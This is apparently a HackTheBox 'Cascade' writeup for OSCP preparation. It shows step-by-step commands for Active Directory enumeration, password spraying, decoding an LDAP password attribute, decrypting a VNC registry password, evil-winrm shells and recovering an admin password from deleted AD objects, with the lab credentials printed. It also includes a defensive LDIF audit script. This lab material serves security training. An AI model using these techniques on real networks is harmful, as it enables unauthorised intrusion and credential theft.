Prep for OSCP — HTB [M] Cascade — Writeup

You can also read this article on Medium.

Cascade is a medium difficulty Windows machine configured as a Domain Controller.

Information Gathering

We start with an nmap scan.

nmap

```bash
└─$ nmap -sC -sV -vvv -oN enum/nmap -Pn 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up, received user-set (0.089s latency).
Scanned at 2024-05-01 10:20:03 EDT for 108s
Not shown: 987 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-05-01 14:20:16Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
49154/tcp open  msrpc         syn-ack Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
```

Since the DNS, Kerberos and LDAP ports are open, we can conclude that this is a Domain Controller.

enum4linux

```bash
└─$ enum4linux -a 10.10.10.182 | tee -a enum/enum4linux
...
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
...
```

We can try an AS-REP Roasting attack with these usernames.

ASREPRoast

```bash
└─$ sudo impacket-GetNPUsers CASCADE/ -dc-ip 10.10.10.182 -format hashcat -outputfile asrep.hashes -usersfile usernames.txt
Impacket v0.11.0 - Copyright 2023 Fortra

[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User arksvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.smith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User r.thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User util doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.wakefield doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User s.hickson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.goodhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.turnbull doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User d.burman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User BackupSvc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j.allen doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
```

No hashes were found, so we try password spraying with the usernames as passwords.

Password Spraying with Usernames

```bash
└─$ crackmapexec smb 10.10.10.182 -u usernames.txt -p usernames.txt | grep +
```

No credentials were found. Next we enumerate LDAP.

Ldapsearch

```bash
└─$ ldapsearch -x -H ldap://10.10.10.182 -s base namingcontexts
...
namingContexts: DC=cascade,DC=local
...
```

We take that naming context as the search base and run the query again.

```bash
└─$ ldapsearch -x -H ldap://10.10.10.182 -b "DC=cascade,DC=local"
...
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
...
```

Now we have found a valuable field: cascadeLegacyPwd, which decodes from base64 to rY4n5eva. So r.thompson:rY4n5eva is our way in. To keep things organised, I record this information as follows:

```bash
└─$ echo "r.thompson:rY4n5eva" >> creds
└─$ echo "rY4n5eva" >> valid_passwords
```

I also don't forget to spray the new password against the other users. Next, we list the SMB shares as r.thompson.

```bash
└─$ smbmap -H 10.10.10.182 -u r.thompson -p "rY4n5eva"
...
[+] IP: 10.10.10.182:445        Name: cascade.local             Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Audit$                                                  NO ACCESS
        C$                                                      NO ACCESS       Default share
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        print$                                                  READ ONLY       Printer Drivers
        SYSVOL                                                  READ ONLY       Logon server share
```

We couldn't get a shell with these credentials, so we examine the Data share to check whether it contains any information leakage.

We found a file named Meeting_Notes_June_2018.html that looks like an email.

[Image: contents of Meeting_Notes_June_2018.html]

I make a note of the TempAdmin mention for later, but for now I move on to the other files. I found a .reg file in s.smith's folder.

```bash
└─$ cat VNC\ Install.reg
Windows Registry Editor Version 5.00
...
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
...
```

I searched Google for “vnc install reg decrypt” and found that link. As the link describes:

```bash
└─$ echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
00000000  73 54 33 33 33 76 65 32                           |sT333ve2|
00000008
```

So the password for s.smith is sT333ve2. We quickly verify the credentials and add them to our creds and valid_passwords files.

```bash
└─$ crackmapexec smb 10.10.10.182 -u s.smith -p sT333ve2
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\s.smith:sT333ve2

└─$ echo "s.smith:sT333ve2" >> creds
└─$ echo "sT333ve2" >> valid_passwords
```

Initial Foothold

We can now get a shell with evil-winrm using s.smith's credentials.

```bash
└─$ evil-winrm -i 10.10.10.182 -u "cascade.local\s.smith" -p 'sT333ve2'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents>
```

Post-Exploitation

```powershell
*Evil-WinRM* PS C:\Users\s.smith\Desktop> net user s.smith
User name                    s.smith
Full Name                    Steve Smith
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/28/2020 8:58:05 PM
Password expires             Never
Password changeable          1/28/2020 8:58:05 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 MapAuditDrive.vbs
```
The logon script is configured as MapAuditDrive.vbs. Logon scripts are generally located in the NETLOGON share, so we fetch it from there.

```bash
└─$ cat MapAuditDrive.vbs
'MapAuditDrive.vbs
Option Explicit
Dim oNetwork, strDriveLetter, strRemotePath
strDriveLetter = "F:"
strRemotePath = "\\CASC-DC1\Audit$"
Set oNetwork = CreateObject("WScript.Network")
oNetwork.MapNetworkDrive strDriveLetter, strRemotePath
WScript.Quit
```

It maps the Audit$ share as drive F:, so that share is our next stop.

```bash
└─$ smbclient \\\\10.10.10.182\\Audit$  -U s.smith
Password for [WORKGROUP\s.smith]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 29 13:01:26 2020
  ..                                  D        0  Wed Jan 29 13:01:26 2020
  CascAudit.exe                      An    13312  Tue Jan 28 16:46:51 2020
  CascCrypto.dll                     An    12288  Wed Jan 29 13:00:20 2020
  DB                                  D        0  Tue Jan 28 16:40:59 2020
  RunAudit.bat                        A       45  Tue Jan 28 18:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 02:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 02:38:38 2019
  x64                                 D        0  Sun Jan 26 17:25:27 2020
  x86                                 D        0  Sun Jan 26 17:25:27 2020

                6553343 blocks of size 4096. 1625283 blocks available
```

Examining the files, we find user and password entries in the Ldap table of the DB\Audit.db database.

[Image: Ldap table of DB\Audit.db]

At first I thought CascAudit.exe could decrypt the file, and I tried to run the executable on my Windows host. It failed because of missing dependencies, and running it was not actually necessary: we can reverse engineer the binary with ILSpy.

Opening it in ILSpy, I found a function named DecryptString.

[Image: DecryptString function in ILSpy]

I then searched Google for “decrypt aes” and used the site below with the information above. The secret key is the ‘key’ parameter passed where the code calls this function.

AES Online Decryption

So the password for arksvc is w3lc0meFr31nd. We quickly verify the credentials and add them to our creds and valid_passwords files.

```bash
└─$ crackmapexec smb 10.10.10.182 -u arksvc -p w3lc0meFr31nd
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\arksvc:w3lc0meFr31nd

└─$ echo "arksvc:w3lc0meFr31nd" >> creds
└─$ echo "w3lc0meFr31nd" >> valid_passwords
```

Privilege Escalation

We log on with evil-winrm as the arksvc user.

```bash
└─$ evil-winrm -i 10.10.10.182 -u 'arksvc' -p 'w3lc0meFr31nd'

*Evil-WinRM* PS C:\Users\arksvc\Documents> net user arksvc
User name                    arksvc
Full Name                    ArkSvc
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/9/2020 5:18:20 PM
Password expires             Never
Password changeable          1/9/2020 5:18:20 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/29/2020 10:05:40 PM

Logon hours allowed          All

Local Group Memberships      *AD Recycle Bin       *IT
                             *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.
```

We see that arksvc is a member of the privileged AD Recycle Bin group. With help from this hacktricks.xyz link, we can query deleted objects and recover sensitive information from them.

```powershell
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
```

I searched for the TempAdmin string in this output and saw the cascadeLegacyPwd attribute again. Decoding this field:

```bash
└─$ echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles
```

Then we check whether this password is valid for the Administrator account:

```bash
└─$ crackmapexec smb 10.10.10.182 -u Administrator -p 'baCT3r1aN00dles'
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\Administrator:baCT3r1aN00dles (Pwn3d!)
```
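Both the r.thompson entry from ldapsearch and the deleted TempAdmin object leaked a password through the same custom attribute, cascadeLegacyPwd. As an added example (not part of the original writeup), here is a small Python audit that parses ldapsearch LDIF output and flags non-standard attributes whose values are base64-encoded printable text, the kind of attribute a directory owner should review and purge. The LDIF below is constructed from the entries shown in this post; the DNs, the attribute allowlist and the description value are assumptions for the example.

```python
import base64
import string

# Constructed, abridged allowlist of attributes expected on an AD user object.
KNOWN_ATTRS = {"dn", "objectClass", "cn", "sAMAccountName", "sAMAccountType",
               "userPrincipalName", "objectCategory", "isDeleted"}

# Constructed LDIF modelled on the r.thompson entry and the deleted TempAdmin object.
SAMPLE_LDIF = """\
dn: CN=r.thompson,CN=Users,DC=cascade,DC=local
sAMAccountName: r.thompson
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=TempAdmin,CN=Deleted Objects,DC=cascade,DC=local
sAMAccountName: TempAdmin
isDeleted: TRUE
description:: VGVtcCBhZG1pbiBhY2NvdW50
cascadeLegacyPwd: YmFDVDNyMWFOMDBkbGVz
"""

def parse_ldif(text):
    """Yield {attr: [values]} per blank-line-separated entry. 'attr:: v' is ldapsearch's
    own base64 framing for non-ASCII data and is undone here; 'attr: v' is kept verbatim."""
    for block in text.strip().split("\n\n"):
        entry = {}
        for line in block.splitlines():
            attr, _, value = line.partition(":")
            if value.startswith(":"):
                value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
            entry.setdefault(attr, []).append(value.strip())
        yield entry

def decode_if_b64_text(value):
    """Decoded string if value is base64 of printable ASCII (the shape of an
    application-level 'encoded' secret rather than real binary data), else None."""
    try:
        decoded = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded and all(c in string.printable for c in decoded) else None

def find_suspect_attrs(ldif_text):
    """(account, attribute, decoded) for every non-standard attribute holding
    base64 text: the attributes to review and purge from the directory."""
    hits = []
    for entry in parse_ldif(ldif_text):
        who = entry.get("sAMAccountName", entry.get("dn", ["?"]))[0]
        for attr, values in entry.items():
            if attr not in KNOWN_ATTRS:
                hits.extend((who, attr, d) for d in map(decode_if_b64_text, values) if d)
    return hits
```

Note the difference between the two base64 cases: the `description::` line is only ldapsearch's transport encoding and is not reported, while the single-colon `cascadeLegacyPwd` values are base64 as stored in the directory and are.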

Conclusions

I have to say that the part where we examine the ldapsearch output is hard to think of. If you are preparing for the OSCP exam, OSCP does not expect you to dig that deep.

On the positive side, I have added examining ldapsearch output to my checklist.

This was my first time reverse engineering with ILSpy.

I noted the HackTricks privileged groups link and added it to my Windows privilege escalation checklist.

This post is licensed under CC BY 4.0 by the author.